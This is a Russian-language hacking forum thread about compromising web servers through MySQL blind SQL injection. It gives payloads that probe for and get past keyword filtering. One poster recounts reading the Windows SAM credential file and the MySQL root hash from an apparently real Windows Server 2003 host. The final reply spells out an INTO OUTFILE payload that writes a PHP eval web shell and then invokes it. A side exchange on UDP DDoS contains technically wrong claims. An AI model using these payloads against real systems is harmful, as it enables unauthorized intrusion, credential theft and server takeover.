Ну так сначала проверь версию, если не 5ая, то нету этой таблицы, есть 5ая, то проверь на доступность, бывает всякое.
причём тут посимвольно? посимвольно я и ручками могу) тут же в другом дело: я не могу определить то ли доступ к information_schema закрыт, то ли from фильтруется
Seravin Допустим, запрос выглядит так: Code: id=if(ascii((select version()))=53,1,0) -- 1 Проверить на фильтрацию from можно двумя способами: 1) Поставить слово после комментария. Code: id=if(ascii((select version()))=53,1,0) -- 1 from Если возвращается false, то from фильтруется 2) Запрос вида Code: id=if(ascii((select version() from (select 1)a))=53,1,0) -- 1 Если возвращает false (Либо нечто отличное от первого запроса, то тогда from фильтруется)
2kamaz когда пишешь: id = 1 -- работает id = 1 -- 1 редирект там както url обрабатывается ещё, т.к. когда id = 1 #, он пишет id=1/#/ я чёт хз чё они там вообще делают(
Слепую скулю можно раскручивать, вообще не используя комментарии. Так что, если сайт ругается, то используй второй запрос. Для него комментарий не обязателен. А вместо id=1 # следует писать id=1%23 Это так, к слову)
2kamaz сори, не обратил внимания) значит, походу фильтруется from. Какие есть способы это обойти, кроме FrOM(пробовал) /*!from*/ (тоже не пойдёт, используется mod_rewrite походу)
У меня вопрос про UDP(прочитал сейчас статейку про DDOS). И там было написано примерное следующее: При TCP flood атаке нужно подключение к атакуемому серверу, а при UDP - не нужно. Залез на Вики,там тоже написано,что протокол UDP не требует подключения. И вот такой вопрос: как можно ДДосить цель,не подключаясь к ней? В чем тогда заключается сама суть UDP атаки?
разница в протаколах tcp и udp в том что, для отправки данных между 2 хостами (через tcp) нужно сначало создать соединение(ну там icmp запросы и тп). а для передачы данных через протокол udp не требуется создать соединения потом отправить данные, вы по прямому отправляете пакеты на нужный хост, и в результате этого передача данных осуществляется несколько раз быстрее чем через протокол tpc
Через скуль-иньекцию в MySQL-5 вывел на страницу содержимое файла SAM от сервера под Win2003. Скопировав все эти крякозябры в текстовый файл, попытался скормить его SAMInside'у, однако этот вариант не прокатил. Каким образом можно чисто слить этот файл? Не важно из под винды или линя.
Знаю что есть в C:\WINDOWS\repair копия файла SAM и SYSTEM попробуй. Даже под админом нельзя кажется вытащить C:\WINDOWS\system32\config отсюда потому что системный процесс его блочит, надо загрузится под другой виндой т.е. второй или из под линукса, тогда даст скопировать.
Конечно спасибо за лекцию о системе защиты файлов 'Security Account Manager' операционных систем WinNT-based и вариантов ее обхода, но я просто спросил, как можно скулей слить файл не покорежив его содержимое?) может curl'ом? Расковыряв базу mysql.user, получил пасс рута. Расшифровав его попытался подключиться к базе на порт 3306, но видимо удаленная работа с базой запрещена в настройках MySQL, поэтому этот вариант так же не прокатил. Сервак крутиться под WinServer2003, IIS6.0. Легко читаются файлы. Просмотрел my.ini и php.ini - ничего полезного... Есть еще какие нибудь полезные) файлы? Поискал на форуме по теме раскрутки скули под Win2003&IIS, но ничего подходящего не нашел. Не подскажите где можно почитать на эту тему какую нибудь статью или видео?
Значит идея такая. Через SQL-иньекцию прочитать файл SAM сервера, скопировать отобразившееся на странице его содержимое в Блокнот у себя, переименовать этот текстовый файл в SAM и открыть его в программе SAMInside для того чтобы заняться паролями. Проблема в том, что после копирования из браузера в Блокнот и сохранения его, SAMInside говорит, что файл битый. Видимо тут какие-то траблы с кодировкой либо при отображении в браузере, либо при сохранении в текстовик.
Пробуй вытащить с папки Repair (старый файл до смени пароля) мб поможет а сам SAM файл получить не получится он занять и открыть тоже не выйдет....имхо пробуй залиться (если права хватит) и поднять RDP так проще будет ..
Люююди! Товарищи! Родимые! ААААаааа! Я ЧИТАЮ ФАЙЛ ИМЕННО ИЗ ПАПКИ C:\WINDOWS\REPAIR\! Я ЗНАЮ, ЧТО ИЗ ПАПКИ C:\WINDOWS\SYSTEM32\CONFIG\ ЕГО НЕ ВЫТАЩИТЬ, ПОТОМУ ЧТО ОН ОТКРЫТ СИСТЕМОЙ! Уже второй человек мне об этом говорит! Я же упомянул выше, что я знаю, что нужно открывать именно C:\WINDOWS\repair\SAM. Праздники же закончились! Подскажи, пожалуйста, где почитать о "заливке и поднятии RDP" посредством SQL-иньекции в скрипте находящегося под управлением MySQL5 базирующемся на Windows Server 2003? Спасибо!
Через MySQL залить можно, а вот выполнить нет. Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так Code: SELECT c FROM t UNION ALL SELECT '<?php eval($_GET[ev]);?>' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение' и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo(); Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.